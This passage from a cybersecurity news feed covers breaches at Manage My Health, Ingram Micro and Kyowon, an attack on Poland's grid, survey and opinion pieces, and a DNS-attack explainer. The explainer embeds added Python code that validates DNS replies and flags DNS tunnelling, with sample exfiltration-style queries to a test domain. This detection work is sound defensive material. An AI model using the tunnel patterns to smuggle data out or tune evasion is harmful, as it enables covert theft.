According to The Star, Nike has been working to regain its position as the world’s dominant sportswear brand after losing market share to smaller competitors. Against this backdrop, the emergence of a potential Nike cyberattack adds another layer of uncertainty. Despite the reports, Nike’s shares were flat as of late morning on Monday, indicating that investors may be waiting for verified details before reacting. As investigations continue, it remains uncertain whether the alleged Nike data breach will be confirmed or what consequences may follow. Nike has stated only that it is actively assessing the situation, and further information is expected as the inquiry progresses and the claims are independently evaluated. This is an ongoing story, and The Cyber Express will be closely monitoring the situation. We will update this post once we have more information on the Nike cyberattack or any additional information from the company.

Manage My Health Data Breach Sparks Warnings Over Impersonation and Phishing Attempts

Manage My Health data breach

The fallout from the Manage My Health data breach is continuing, with the company warning that fraudsters may now be attempting to contact affected users by impersonating the online patient portal. Manage My Health, which operates a widely used digital health platform in New Zealand, confirmed that most people impacted by the breach have now been notified. However, the organization cautioned that secondary criminal actors may be exploiting the situation by sending phishing or spam messages that appear to come from Manage My Health. “We’re also aware that secondary actors may impersonate MMH and send spam or phishing emails to prompt engagement. These communications are not from MMH,” the company said in a statement. It added that it is investigating measures to limit this activity and has issued guidance to help users protect themselves. The MMH cyberattack, which occurred late last year, involved unauthorized access to documents stored within a limited feature of the platform. Cyber criminals reportedly demanded thousands of dollars in ransom, threatening to release sensitive data on the dark web. If released, the information could have exposed the medical details of more than 120,000 New Zealanders.

Information Accessed in the Manage My Health Data Breach 

According to Manage My Health, the cyberattack did not affect live GP clinical systems, prescriptions, appointment scheduling, secure messaging, or real-time medical records. Instead, the breach was confined to documents stored in the “My Health Documents” section of the platform.  These documents included files uploaded by users themselves, such as correspondence, reports, and test results, as well as certain clinical documents. The latter consisted of hospital discharge summaries and clinical letters related to care received in Northland Te Tai Tokerau.  Upon detecting unusual system activity, Manage My Health said it immediately secured the affected feature, blocked further unauthorized access, and activated its incident response plan. Independent cybersecurity specialists were engaged to investigate the incident and confirm its scope.  The company stated that the breach has since been contained and that testing has confirmed the vulnerability is no longer present. 

Notifications and Regulatory Response 

Manage My Health acknowledged that its initial response led to some individuals being notified prematurely. “When we first identified the breach, our priority was to promptly inform all potentially affected patients,” the organization said, noting that this cautious approach resulted in some people being contacted even though they were later found not to be impacted.  Following forensic investigations, those individuals were subsequently informed that their data had not been affected. Users can confirm their status by logging into the Manage My Health web application, where a green “No Impact” banner indicates no involvement in the incident.  The company said notification efforts are ongoing due to the complexity of coordinating communications across patient groups, authorities, and data controllers, while ensuring compliance with the New Zealand Privacy Act.  The Manage My Health data breach has also triggered regulatory scrutiny. The Office of the Privacy Commissioner (OPC) has announced an inquiry into the privacy aspects of the incident. Manage My Health confirmed it is working closely with the OPC, as well as Health New Zealand | Te Whatu Ora, the National Cyber Security Centre, and the New Zealand Police. 

Legal Action and Monitoring Efforts 

As part of its response to the MMH cyberattack, Manage My Health sought and was granted an interim injunction from the High Court. The injunction prohibits any third party from accessing, publishing, or disseminating the impacted data.  The organization said it is actively monitoring known data leak websites and is prepared to issue takedown notices immediately if any information appears online.  Additional security measures taken include remediating compromised account credentials, temporarily disabling the Health Documents module, and implementing continuous monitoring while broader security upgrades are rolled out. An independent forensic investigation remains ongoing, with the company declining to comment on specific technical findings at this stage. 

Guidance for Users 

Manage My Health has reiterated that it will never ask users for passwords or one-time security codes. It has urged caution when receiving unexpected or urgent messages claiming to be from the company.  Anyone contacted by individuals claiming to possess their health data is advised not to engage and to report the incident to New Zealand Police via 105, or 111 in an emergency, and notify Manage My Health support.  To assist those concerned about identity misuse, the company has partnered with IDCARE, which provides free and confidential cyber and identity support across Australia and New Zealand.  “We take the privacy of our clients and staff very seriously, and we sincerely apologise for any concern or inconvenience this incident may have caused,” Manage My Health said, adding that it remains committed to transparency as investigations into the cyberattack on Manage My Health continue. 

Ingram Micro Data Breach Affects Over 42,000 People After Ransomware Attack

22 January 2026 at 01:40

Ingram Micro data breach

Ingram Micro, one of the world’s largest IT distributors, has confirmed that sensitive personal data was leaked following a ransomware attack that disrupted its operations last year. The incident, which paralysed the company’s logistics systems for nearly a week in July 2025, has now been linked to the theft of files containing employee and applicant information, affecting more than 42,000 individuals. The Ingram Micro data breach came to light through a mandatory filing with U.S. authorities, which revealed that 42,521 people were impacted, including five residents of the state of Maine. According to the company, the attackers accessed internal file repositories between July 2 and July 3, 2025, in what the filing describes as an external system breach involving hacking. Although the intrusion itself was detected in July, the company did not confirm until December 26, 2025 that the stolen files contained personal information.

Ransomware Attack Led to Extended Disruption

The data exposure follows a ransomware attack that caused widespread operational disruption at Ingram Micro in July 2025. At the time, the company’s logistics were reportedly paralysed for about a week, affecting its ability to process and distribute products. While the immediate operational impact was known, it has now emerged that the attackers also exfiltrated sensitive files during the same period. In a notice sent to affected individuals, Ingram Micro said it detected a cybersecurity incident involving some of its internal systems on July 3, 2025. The company launched an investigation into the nature and scope of the issue and determined that an unauthorised third party had taken certain files from internal repositories over a two-day window.

Ingram Micro Data Breach: Personal and Employment Data Stolen

The compromised files included employment and job applicant records, containing a wide range of personal information. According to the Ingram Micro data breach notification, the stolen data may include names, contact information, dates of birth, and government-issued identification numbers such as Social Security numbers, driver’s licence numbers, and passport numbers. In addition, certain employment-related information, including work evaluations and application documents, was also accessed. The company noted that the types of affected personal information varied by individual. Ingram Micro employs approximately 23,500 people worldwide, and the breach affected both current and former employees, as well as job applicants. Ingram Micro said it took steps to contain and remediate the unauthorised activity as soon as the incident was detected. These measures included proactively taking certain systems offline and implementing additional security controls. The company also engaged leading cybersecurity experts to assist with its investigation and notified law enforcement. As part of its response to the Ingram Micro data breach, the company conducted a detailed review of the affected files to understand their contents. It was only after completing this review that Ingram Micro confirmed that some of the files contained personal information about individuals.

Support Offered to Affected Individuals

Ingram Micro is notifying impacted individuals and encouraging them to take steps to protect their personal information. Under U.S. law, affected individuals are entitled to one free credit report annually from each of the three nationwide consumer reporting agencies. The company has also arranged to provide complimentary credit monitoring and identity protection services for two years. In its notification, Ingram Micro urged people to remain vigilant by reviewing their account statements and monitoring their credit reports. The company included guidance on how to register for the free protection services and additional steps to reduce the risk of identity theft. For further assistance, Ingram Micro has set up a dedicated call centre for questions related to the breach. The company said it regrets any inconvenience caused and is working to address concerns raised by those affected.

Broader Implications for Corporate Cybersecurity

The incident highlights the growing risks organisations face from ransomware attacks that not only disrupt operations but also result in data theft. The gap between the July intrusion and the December confirmation that personal data was among the stolen files illustrates how long it can take to establish the full scope of an intrusion even after it has been contained. For large enterprises like Ingram Micro, which play a central role in global IT supply chains, the consequences of such attacks can extend beyond immediate operational losses. The exposure of sensitive employee and applicant data adds a long-term dimension to the impact, increasing the risk of identity theft and fraud for those affected. As investigations continue, the ransomware attack on Ingram Micro serves as a reminder of the importance of strong cybersecurity controls, continuous monitoring, and timely incident response to limit both operational disruption and data loss.

One in Ten UK Businesses Fear They Would Not Survive a Major Cyberattack

22 January 2026 at 00:56

UK Businesses Cyberattack

UK businesses are facing growing pressure from cyber threats, with a new survey warning that many may not withstand a major cyberattack. The findings highlight how exposed companies across the country remain to online fraud and cybercrime, as gaps in training, weak password practices, and increasingly sophisticated scams continue to undermine cyber resilience. According to a recent Vodafone Business study, more than one in ten business leaders in the UK believe their organisation would be unlikely to survive a major cyberattack. The research, which surveyed 1,000 senior leaders across British businesses of all sizes, paints a concerning picture of how prepared, or unprepared, many firms are for incidents similar to those that disrupted major UK retailers and car manufacturers last year.

Weak Preparedness and Rising Threats Put Firms at Risk

The survey suggests that risk awareness has grown, but action has not kept pace. Nearly two-thirds of business leaders (63%) reported that their organisation’s risk of cyberattack has increased over the past year. At the same time, 89% said the highly publicised attacks on well-known brands last year had made them significantly more alert to online threats. Despite this heightened awareness, fewer than half (45%) have ensured that all staff have undergone basic cyber-awareness training. This gap between concern and concrete action leaves many UK businesses prepared in name only, without the practical safeguards needed to prevent or respond effectively to incidents. The findings also point to troubling weaknesses in everyday security practices. Password reuse remains widespread, with employers estimating that staff use their work passwords for an average of 11 other personal accounts, including social media and dating platforms. Such habits significantly increase the risk of credential theft and unauthorised access, particularly when personal platforms suffer breaches.

UK Businesses Cyberattack: Human Error Remains a Major Vulnerability

The study underlines the central role of human behaviour in cyber risk. Nearly three-quarters of business leaders (71%) believe that at least one member of their staff would fall for a convincing phishing email. The most common reasons cited were a lack of awareness and training, staff being “too busy,” and the absence of clear protocols for verifying and flagging suspicious messages. These factors continue to erode cyber resilience, especially as phishing campaigns grow more advanced. The emergence of artificial intelligence and deepfake scams is further complicating the threat landscape. Around seven in ten leaders said that deepfake AI videos have made them more wary of video calls that claim to be from senior colleagues or their boss, signalling a growing concern about impersonation fraud and social engineering attacks.

Government Moves to Strengthen National Defences

The UK Government’s announcement of a second Telecommunications Fraud Charter, set to launch later this year, has been positioned as a key step in strengthening national defences against cyber-enabled crime. The charter aims to bring industry and government closer together to close vulnerabilities, disrupt criminal activity, and protect businesses from financial and operational harm. By enhancing collaboration and setting clearer standards for prevention, detection, and response, the new charter is intended to provide a more coordinated framework to safeguard the resilience and trust that UK businesses rely on. It also aligns with a broader fraud strategy expected to be launched next year.

Industry Reaction and Call for Practical Measures

Commenting on the findings, Nick Gliddon, Business Director, VodafoneThree, said: “Some of these findings are truly alarming. The revelation that one in ten business leaders believe their company would not survive a cyber-attack highlights the scale of vulnerability facing UK firms today. “Many steps – such as avoiding password reuse and enhancing staff training – are relatively simple to implement, and Vodafone Business is here to support organisations with practical solutions and expert guidance. “In this context, the Government’s announcement of its second Telecommunications Fraud Charter, coupled with a new fraud strategy to be launched next year, marks a significant and timely development. “This renewed focus from policymakers underscores the seriousness of the threat and the necessity of a united approach between industry and government to effectively tackle online fraud and cyber-crime.” The survey results serve as a warning that cyber resilience is still uneven across sectors and company sizes. While awareness of threats is growing, persistent weaknesses in training, password practices, and incident readiness continue to leave many organisations vulnerable. As cybercriminals adopt more advanced tools and techniques, including AI-driven scams, the gap between perceived risk and real preparedness could become increasingly costly. For UK businesses, cyberattack readiness is no longer optional; it is a critical factor that may determine whether a company can survive and recover from the next major incident.

Cyber Resilience in Healthcare: Lessons from 2025 and Priorities for 2026

21 January 2026 at 02:15

Cyber Resilience in Healthcare

By Suresh Kanniappan, Sales Head, Infrastructure Management and Security Services, US at Happiest Minds

Consider the recent ransomware attack that hit one of the biggest hospital networks in the US. The cyberattack shut down surgeries, made patient records unavailable, and forced emergency departments to divert incoming cases. Unfortunately, this is not an isolated story. Throughout 2025, healthcare organisations have faced a growing wave of cyber threats, highlighting the urgent need for cyber resilience in healthcare. The scale and precision of cyber threats have increased manifold, with impacts extending far beyond data breaches: disrupting care, delaying diagnoses, and even shaking the very foundation of patient trust.

Why has Cyber Resilience in Healthcare Become More Critical Than Ever?

A recent report released by the U.S. Department of Health and Human Services found that more than 133 million patient records were compromised in the first half of 2025, the highest number to date. More concerning is the impact of ransomware attacks, which have grown threefold and now affect everything from electronic health record systems to connected diagnostic equipment. These incidents have had a significant impact on human lives: surgeries were postponed, families were left fearing what would come next, and clinicians lost access to vital data when it was needed most. These were not just operational challenges; they were an alarm for every healthcare system that building strong resilience is essential in today’s highly connected digital world. The lesson is clear: cybersecurity in healthcare is no longer about prevention alone; it is about resilience, recovery, and readiness. So, what must the healthcare industry focus on in 2026 and beyond?
  1. Zero Trust to Replace the Perimeter: Many organisations already have Zero Trust programs, but how effectively they are implemented still needs to be verified. Zero Trust will continue to be the backbone of every industry, ensuring that every user, every device, and every access request is verified without exception. It is not just about restricting access; it is about knowing who has access to what and granting permissions only to the right people for the right requirements.
  2. AI Will Redefine Defense: AI has become an integral part of our lives and is reshaping both cyberattacks and defense. Adversaries are using AI to create personalized phishing attacks, exploit unpatched devices, and steal data and credentials at a pace humans cannot match. Healthcare security teams should adopt AI as a new defense engine, deploying AI-driven threat analytics, automated response workflows, and continuous monitoring to spot and contain threats in real time. This will help them protect data and clinical operations faster and with higher precision.
  3. Supply Chain Vigilance Must Be Stepped Up: The breaches of the past year have largely not originated within hospital boundaries but beyond them, through third-party vendors, devices, and software. Healthcare providers need to scrutinize every vendor, enforcing real-time risk monitoring, contractual accountability, and shared visibility across the entire healthcare value chain.
  4. Regulations Will Drive Accountability: Global regulators are strengthening mandates around healthcare data protection, breach reporting, and AI transparency. In the coming year, leadership involvement in cybersecurity governance will need to be stronger. Boards and CXOs will need to give digital safety the same priority as patient safety. Compliance will become an ongoing practice of accountability rather than an annual paperwork exercise.

Strategic Priorities of Healthcare Leaders

  1. Redefining Cyber Resilience as a Leadership Imperative: Resilience is the need of the hour, and it must start with top management, which has to foster leadership commitment and shared responsibility, bring in a positive mindset, and invest in better cybersecurity tools and service providers that enable patient safety.
  2. Empower People, Not Just Systems: Resilience is not built by technology alone; it has to be instilled in people, and human awareness is the best barrier. Every staff member, from front-line IT administrators to nurses, is integral to protecting the organization's integrity and patients' safety. Periodically conducting simulations, awareness campaigns, and real-world readiness drills will be necessary to make security a shared responsibility rather than an isolated function.
  3. Establish a Culture of Collaboration: Threats don’t operate in isolation, and neither should our defense. Leaders must champion collaboration across hospitals, vendors, industry groups, and public-sector bodies. Proactive threat intelligence sharing and coordinated response frameworks enable healthcare organizations to anticipate disruptions rather than merely react. True resilience is never built in isolation; rather, it is forged through partnership.

The Way Forward: Resilience as the Heartbeat of Healthcare

Healthcare is no longer confined to hospital premises; it has gone well beyond the walls of any hospital. Every network and every device that carries a patient's record or clinical data must be protected in today's connected world. Security is a matter of constant trust rather than a one-time effort or technical achievement. Remaining resilient, even in the face of system failure, without compromising patient care is vital. In 2026, organizations will have to balance innovation with integrity and treat cybersecurity not just as a compliance checklist but as a shared responsibility to protect patient health and data. Integrating AI into cybersecurity practice will further strengthen threat detection and response by identifying and containing threats before they strike. The future of health is defined not by how sophisticated AI becomes but by how well it is integrated into every layer of care. Resilience will come from AI-powered systems that protect patient data, strengthen clinical operations, and make sure the promise of technology truly supports the promise of healing.

Cyberattack Hits Poland’s Power System, But Blackout Prevented

Poland cyberattack

Poland narrowly avoided a nationwide power outage at the end of December after what senior officials have described as the most serious cyberattack on its energy infrastructure in years. The Poland cyberattack occurred during a period of severe winter weather, further complicating the crisis management efforts.  In an interview on RMF FM, Minister of Digital Affairs Krzysztof Gawkowski warned that the threat was no longer hypothetical. “The digital tanks are already here,” he said, referring to the growing use of cyber tools as weapons. According to Gawkowski, the Polish cyberattack was aimed directly at cutting off electricity to citizens in the final days of December. “We were very close to a blackout,” he admitted.  The situation was particularly challenging because the attacks coincided with harsh weather conditions, which further strained the energy system. Despite these factors, authorities managed to stabilize the network before power supplies were interrupted on a large scale. 

Russian Sabotage and the Scale of the Poland Cyberattack 

Krzysztof Gawkowski noted that the government views the incident as deliberate sabotage rather than a random hacking attempt. “Everything suggests that we are dealing with Russian sabotage—because it has to be called by its name—which was intended to destabilize the situation in Poland,” he said during the RMF FM broadcast. He described the operation as the largest cyberattack on Poland’s energy infrastructure in years, with a clear objective of triggering a blackout.

Krzysztof Gawkowski speaks on the Poland cyberattack (Source: RMF)

While stressing the seriousness of the Poland cyberattack, Gawkowski also sought to reassure the public. “There is no need to panic,” he said, adding that state institutions were well prepared to respond and had acted effectively to prevent the worst-case scenario. Additional details were provided earlier by Energy Minister Miłosz Motyka, who said that hackers attempted to breach multiple electricity-producing facilities across the country. The targets included one combined heat and power plant as well as numerous individual renewable energy sources. Motyka described the incident as unprecedented in its coordination. “We have not experienced an attack like this before,” he said. “For the first time, various locations were targeted simultaneously.” According to the minister, the attack was successfully countered before it could cause lasting damage.

Strengthening Defenses Against Future Attacks 

Motyka characterized the Poland cyberattack as “threatening” and fundamentally different from previous incidents. In response, he announced that Poland would step up investment in its energy infrastructure this year. The government plans to implement an “anti-blackout package” focused on modernization and stronger cybersecurity protections to better defend against similar attacks in the future.  The cyberattack on Poland is part of a wider trend affecting institutions and companies across the European Union. In recent years, cyber operations attributed to Russian state-sponsored actors have increasingly targeted critical infrastructure, often described as elements of hybrid warfare aimed at destabilizing the EU and disrupting Western support for Ukraine, accusations that Moscow has denied.  Poland itself has faced a series of cyber incidents in recent months. In November, several attacks disrupted digital payment services, while a separate breach led to the leaking of customer login details from a Polish travel agency.  

Political Fallout Amid Rising Cyber Risks 

The broader implications of the Poland cyberattack have extended into the political arena. During his RMF FM interview, Krzysztof Gawkowski was asked whether technical problems that delayed the leadership election of the Poland 2050 party could also be linked to cyber activity. The vote was not resolved on Monday “for technical reasons,” raising speculation about possible interference.  Gawkowski said he had no direct knowledge connecting the issue to the wider cyberattack on Poland but confirmed that the matter had been reported to the Internal Security Agency. “There will be a review. I’m not ruling out any scenario,” he said. He added that the party itself might have more information, noting, “The services will investigate, but what happened there? I don’t know. This is definitely a problem for Poland 2050.”  The minister also addressed other digital policy issues, including the president’s veto of a digital bill over concerns about online censorship. Gawkowski said he was willing to meet with Karol Nawrocki to discuss the legislation, describing the veto as political in nature and criticizing the narrative that content removal automatically constitutes an attack on freedom of speech. 

What Is a DNS Attack? Understanding the Risks and Threats

DNS Attack

In 2026, when websites, apps, and online services drive nearly every aspect of daily life, the Domain Name System (DNS) acts as the internet’s unsung hero. It serves as the bridge between humans and machines, translating memorable domain names like www.thecyberexpress.com, the website you’re reading this article on, into the numeric IP addresses that computers actually use to connect. But this crucial system is also a prime target for cybercriminals. A DNS attack can disrupt services, steal sensitive data, or redirect users to malicious websites. Understanding what a DNS attack is, the types of DNS attacks, and the vulnerabilities they exploit is essential for securing networks and cloud environments.

Understanding DNS Threats 

A DNS attack is any attempt to exploit vulnerabilities in the Domain Name System to disrupt normal operations, manipulate traffic, or gain unauthorized access. DNS was designed for accessibility rather than security, which makes it susceptible to DNS threats. Attackers exploit the fact that DNS communications are often unencrypted, allowing them to intercept, alter, or redirect traffic. Recent research shows that the economic impact of DNS attacks continues to strain organizational cybersecurity budgets. According to the 2023 Global DNS Threat Report by IDC, 88% of surveyed organizations reported experiencing at least one DNS attack, and most suffered multiple incidents annually. The study found that these attacks impose an average cost of approximately $942,000 per successful breach, on top of operational disruption and reputational harm. DNS attacks are not limited to traditional web browsing; they can target internal networks, cloud-hosted DNS services, and enterprise infrastructure. A recent example occurred on January 8, 2026, when a global DNS attack caused Cisco Small Business Switches to enter repeated reboot loops. Faults in the DNS client service triggered crashes across multiple models, from the CBS250 to the SG550X series, affecting organizations worldwide. In many cases, temporarily disabling DNS queries stabilized networks, highlighting how dependent infrastructure can be on proper DNS functionality.

How DNS Attacks Work 

A DNS attack typically exploits a DNS vulnerability to manipulate traffic or disrupt service. Attackers can: 
  • Intercept DNS queries and provide malicious responses. 
  • Redirect users to fraudulent websites for phishing or malware distribution. 
  • Overload DNS servers to cause downtime through DNS DDoS attacks. 
  • Exploit caching mechanisms to redirect legitimate traffic (DNS poisoning). 
In technical terms, attackers may spoof the source address of a DNS request so that it appears to come from the victim. When the server responds, the reply is sent to the target rather than to the actual requester; because DNS replies are often much larger than the queries that trigger them, this is the basis of reflection and amplification attacks. The outcome can be unauthorized access, website downtime, or network compromise. In cloud environments, where DNS maps Fully Qualified Domain Names (FQDNs) to virtual machines or hosted zones, a successful DNS attack can disrupt services and expose sensitive data.
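Spoofed replies only get through when a resolver accepts whichever answer arrives first. The following added example (not code from the article or any resolver project) shows the checks a resolver applies before trusting a reply: matching transaction ID, the randomised source port, and question and answer names. The minimal DNS wire-format helpers and the function names are constructed for illustration.

```python
"""Resolver-side validation of DNS replies, as a defence against spoofed
(cache-poisoning) responses. Constructed example; the function names and the
minimal wire-format helpers are illustrative, not a real resolver's API."""
import random
import struct

TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS labels (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, offset: int):
    """Decode a name at offset, following one compression pointer if present.
    Returns (name, offset_after_name)."""
    labels = []
    while True:
        length = msg[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:  # 2-byte pointer into an earlier name
            ptr = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            target, _ = decode_name(msg, ptr)
            labels.append(target)
            return ".".join(labels), offset + 2
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def build_query(txid: int, name: str, qtype: int = TYPE_A) -> bytes:
    """Standard query with the RD (recursion desired) flag set."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def build_answer(txid: int, name: str, ip: str, qtype: int = TYPE_A) -> bytes:
    """Response carrying one A record; the answer name is a pointer to the
    question name at offset 12 (0xC00C), as real servers emit it."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", qtype, CLASS_IN, 300, len(rdata)) + rdata
    return header + question + answer


def validate_response(query: bytes, response: bytes, query_port: int,
                      reply_dst_port: int):
    """Checks a resolver applies before accepting a reply into its cache.
    A blind spoofer must guess the 16-bit transaction ID *and* the randomised
    source port, and the answer must be for the name actually asked about."""
    if reply_dst_port != query_port:
        return False, "port mismatch"
    if len(response) < 12:
        return False, "truncated header"
    q_id = struct.unpack("!H", query[:2])[0]
    r_id, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", response[:12])
    if r_id != q_id:
        return False, "transaction id mismatch"
    if not flags & 0x8000:
        return False, "not a response"
    if qdcount != 1:
        return False, "unexpected question count"
    qname, qoff = decode_name(query, 12)
    rname, roff = decode_name(response, 12)
    if qname.lower() != rname.lower() or query[qoff:qoff + 4] != response[roff:roff + 4]:
        return False, "question section mismatch"
    if ancount:
        aname, _ = decode_name(response, roff + 4)
        if aname.lower() != qname.lower():
            return False, "answer for a different name"
    return True, "ok"


def demo():
    """Genuine reply accepted; a forged reply with a wrong ID, and a reply
    sent to the wrong port, are both dropped. Addresses are documentation ranges."""
    txid = random.randrange(1 << 16)
    port = random.randrange(1024, 1 << 16)
    name = "www.example.com"
    query = build_query(txid, name)
    genuine = build_answer(txid, name, "192.0.2.10")
    forged = build_answer((txid + 1) % (1 << 16), name, "203.0.113.7")
    return (validate_response(query, genuine, port, port)[0],
            validate_response(query, forged, port, port)[0],
            validate_response(query, genuine, port, 53)[0])


if __name__ == "__main__":
    print(demo())  # (True, False, False)
```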

Common DNS Attack Types 

DNS attacks come in many forms, ranging from simple hijacks to multi-vector campaigns. Understanding these types of DNS attacks is crucial for prevention.
  • DNS Hijacking: Attackers redirect legitimate traffic to malicious sites by altering DNS records. This can occur through compromised servers or man-in-the-middle interception, leading to data theft or malware infections.
  • DNS Cache Poisoning: Also known as DNS poisoning, this attack injects false data into a DNS resolver’s cache, causing it to return incorrect IP addresses. Users unknowingly visit attacker-controlled sites. 
  • DNS Flood and DDoS Attacks: A DNS flood is a denial-of-service attack that overwhelms servers with excessive requests. DNS DDoS attack types often combine spoofing and amplification techniques to maximize disruption, targeting both authoritative servers and resolvers.
  • DNS Tunneling: Here, attackers encapsulate malicious data within DNS queries or responses, often to exfiltrate sensitive information or maintain command-and-control channels undetected.
  • Phantom Domain and Botnet-Based Attacks: Attackers may generate fake domains to overload resolvers or use a network of compromised devices to launch coordinated attacks. These DNS-based attacks are challenging to defend against due to their distributed nature.
  • Cover and Malware Attacks: Some attacks manipulate DNS as a distraction, enabling other attacks to succeed. Others directly use DNS viruses or malware to disrupt network services. 

Preventing DNS Attacks 

Defending against DNS attacks requires both proactive monitoring and strategic configuration: 
  • Audit DNS zones regularly to remove outdated or vulnerable entries. 
  • Keep DNS servers updated with the latest security patches. 
  • Restrict zone transfers to prevent unauthorized access. 
  • Disable DNS recursion on authoritative servers to prevent amplification attacks. 
  • Implement DNSSEC to add digital signatures to DNS data, mitigating spoofing. 
  • Use threat prevention tools and DNS firewalls to block malicious domains and detect exfiltration attempts. 
In cloud environments, organizations must also secure DNS by controlling traffic with security groups and access control lists (ACLs). Cloud providers manage the infrastructure, but customers are responsible for their configuration, including zones, records, and administrative access. 
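The tunneling technique listed among the attack types and the advice above to detect exfiltration attempts come down to the same task on the defender's side: spotting subdomains that carry encoded data rather than hostnames. The following added example (not from the article or any product) scores a constructed resolver query log per registrable domain by subdomain variety, label length and Shannon entropy; the log format, the thresholds and the "last two labels" domain rule are assumptions.

```python
"""Flag DNS tunnelling / exfiltration candidates in a resolver query log.
Constructed example: the log format, thresholds and the 'last two labels'
domain rule are assumptions, not taken from any product or the article."""
import math
import re
from collections import defaultdict

# Constructed sample log lines: "<timestamp> <client> <qname> <qtype>".
# Lines 3-6 imitate a tunnel: hex/base64-looking labels under one domain.
SAMPLE_LOG = """\
2026-01-15T10:00:01Z 10.0.0.5 www.example.com A
2026-01-15T10:00:02Z 10.0.0.5 mail.example.com MX
2026-01-15T10:00:03Z 10.0.0.9 4a6f686e20446f65.ZGF0YTEyMw.exfil-demo.test TXT
2026-01-15T10:00:03Z 10.0.0.9 5061737377303264.YWJjZGVmZw.exfil-demo.test TXT
2026-01-15T10:00:04Z 10.0.0.9 ZmlsZTAwMQ.3a9f1c2b4d5e6f70.exfil-demo.test TXT
2026-01-15T10:00:05Z 10.0.0.9 8e7d6c5b4a392817.Y29uZmlnLnltbA.exfil-demo.test TXT
2026-01-15T10:00:06Z 10.0.0.5 cdn.example.com A
2026-01-15T10:00:07Z 10.0.0.7 updates.example.org A
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

# Illustrative thresholds; baseline them against your own traffic first.
MIN_UNIQUE_SUBDOMAINS = 3        # tunnels mint a new subdomain per chunk
MIN_MEAN_LABEL_LEN = 20          # encoded payloads make long subdomain strings
MIN_MEAN_ENTROPY = 3.0           # bits per character; hostnames are far less random
PAYLOAD_TYPES = {"TXT", "NULL"}  # record types commonly abused for tunnels


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's byte-frequency distribution."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    # Assumption: the last two labels are the registrable domain.
    # Production code should consult the Public Suffix List instead.
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_log(text: str):
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, client, qname, qtype = m.groups()
            records.append({"ts": ts, "client": client,
                            "qname": qname.rstrip(".").lower(),
                            "qtype": qtype.upper()})
    return records


def domain_stats(records):
    """Per registrable domain: volume, subdomain variety, label length,
    entropy and the share of payload-friendly record types."""
    per_domain = defaultdict(list)
    for r in records:
        per_domain[registered_domain(r["qname"])].append(r)
    stats = {}
    for dom, recs in per_domain.items():
        # subdomain part only, e.g. "www" for www.example.com
        subs = [r["qname"][:-len(dom)].rstrip(".") for r in recs]
        n = len(recs)
        stats[dom] = {
            "queries": n,
            "clients": sorted({r["client"] for r in recs}),
            "unique_subdomains": len(set(subs)),
            "mean_label_len": sum(len(s) for s in subs) / n,
            "mean_entropy": sum(shannon_entropy(s) for s in subs) / n,
            "payload_type_ratio": sum(r["qtype"] in PAYLOAD_TYPES for r in recs) / n,
        }
    return stats


def flag_domains(text: str):
    """Return domains whose query pattern looks like tunnelling."""
    flagged = []
    for dom, st in domain_stats(parse_log(text)).items():
        if (st["unique_subdomains"] >= MIN_UNIQUE_SUBDOMAINS
                and st["mean_label_len"] >= MIN_MEAN_LABEL_LEN
                and st["mean_entropy"] >= MIN_MEAN_ENTROPY):
            flagged.append(dom)
    return flagged


if __name__ == "__main__":
    all_stats = domain_stats(parse_log(SAMPLE_LOG))
    for dom in flag_domains(SAMPLE_LOG):
        st = all_stats[dom]
        print(f"{dom}: {st['queries']} queries from {st['clients']}, "
              f"mean label len {st['mean_label_len']:.1f}, "
              f"entropy {st['mean_entropy']:.2f}, "
              f"payload types {st['payload_type_ratio']:.0%}")
```

A real deployment would add a per-client view and a time window so that a slow tunnel spread across hours still trips the unique-subdomain count.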

Conclusion 

A DNS attack is a potent threat that exploits the vulnerabilities of the Domain Name System to disrupt services, steal data, or redirect traffic. With common DNS attacks such as hijacking, cache poisoning, DNS floods, and tunneling, organizations must prioritize DNS security. Understanding DNS vulnerabilities, implementing preventive measures, and monitoring traffic continuously are essential for protecting both local networks and cloud infrastructure from DNS attacks.

Kyowon Group Confirms Cyberattack as Multiple Systems Go Offline

Kyowon Group cyberattack

A Kyowon Group cyberattack has just been revealed, making the incident one of the latest breaches affecting South Korean companies in recent weeks. Amid ongoing investigations into breaches at companies such as KT, the country’s three major telecommunications firms, and Lotte Card, the Kyowon Group cyberattack has raised concerns due to the company’s extensive customer base across its many subsidiaries.  According to the latest updates on its website, Kyowon Group detected signs of an external intrusion on the morning of January 10. After identifying abnormal activity, the company immediately shut down parts of its internal systems and began emergency recovery measures. The incident was publicly acknowledged on January 11, when access to Kyowon Group’s main website and several affiliated sites became unavailable. 

Systems Shut Down After the Kyowon Group Cyberattack  

As of January 12, a service disruption notice was displayed across Kyowon Group and subsidiary websites, stating, “Web service is unavailable due to unexpected disruptions.” At that time, users were still unable to access online services, indicating the impact of the Kyowon Group cyberattack was ongoing.

Kyowon Group alerts users to a cyberattack on its systems (Source: Kyowon Group)

A Kyowon Group representative confirmed the breach, stating, “We have confirmed indications of a breach,” while emphasizing that investigations were still underway. The representative added, “We are still investigating whether any personal information has been leaked.” The company also announced that it planned to release an official statement the following morning once more details were confirmed.

Multiple Affiliate Websites Go Offline as Recovery Efforts Continue 

